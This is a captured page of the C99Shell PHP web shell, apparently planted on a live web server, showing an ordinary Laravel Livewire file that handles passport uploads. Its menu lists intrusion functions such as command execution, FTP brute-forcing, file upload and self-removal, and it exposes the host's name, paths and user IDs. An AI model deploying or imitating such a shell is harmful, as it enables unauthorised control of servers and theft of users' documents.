!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/app/Http/Livewire/   drwxr-xr-x
Free 28.38 GB of 117.98 GB (24.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     VerifyAccount.php (1.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Http\Livewire;

use 
App\Models\Admin;
use 
App\Models\User;
use 
App\Models\UserDocumentVerification;
use 
App\Notifications\DocumentVerificationRequestNotification;
use 
Illuminate\Support\Facades\Notification;
use 
Livewire\Component;
use 
Livewire\WithFileUploads// Import the WithFileUploads trait

class VerifyAccount extends Component
{
    use 
WithFileUploads// Use the WithFileUploads trait

    
public User $user;

    protected 
$rules = [
        
'passport' => 'required|file|mimes:pdf,jpg,jpeg,png|max:2048'// 2MB Max
    
];

    public 
$passport;

    public function 
render()
    {
        return 
view('livewire.verify-account');
    }

    public function 
save()
    {

        
$this->validate();

        
// Upload passport file if it exists

        
if ($this->passport) {
            
$name $this->passport->store();
        }

        
// Create a new UserDocumentVerification record
        
$document UserDocumentVerification::create([
            
'user_id' => auth()->id(),
            
'password_photo_url' => $name ?? ''// Use null if $passport is not set
            
'status' => 'pending',
        ]);

        if (
checkMailConfig()) {
            
$admins Admin::all();
            foreach (
$admins as $admin) {
                
Notification::send($admin, new DocumentVerificationRequestNotification($adminauth()->user(), $document));
            }
        }
        
session()->flash('success''Verify successfully!');

        return 
to_route('frontend.dashboard');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--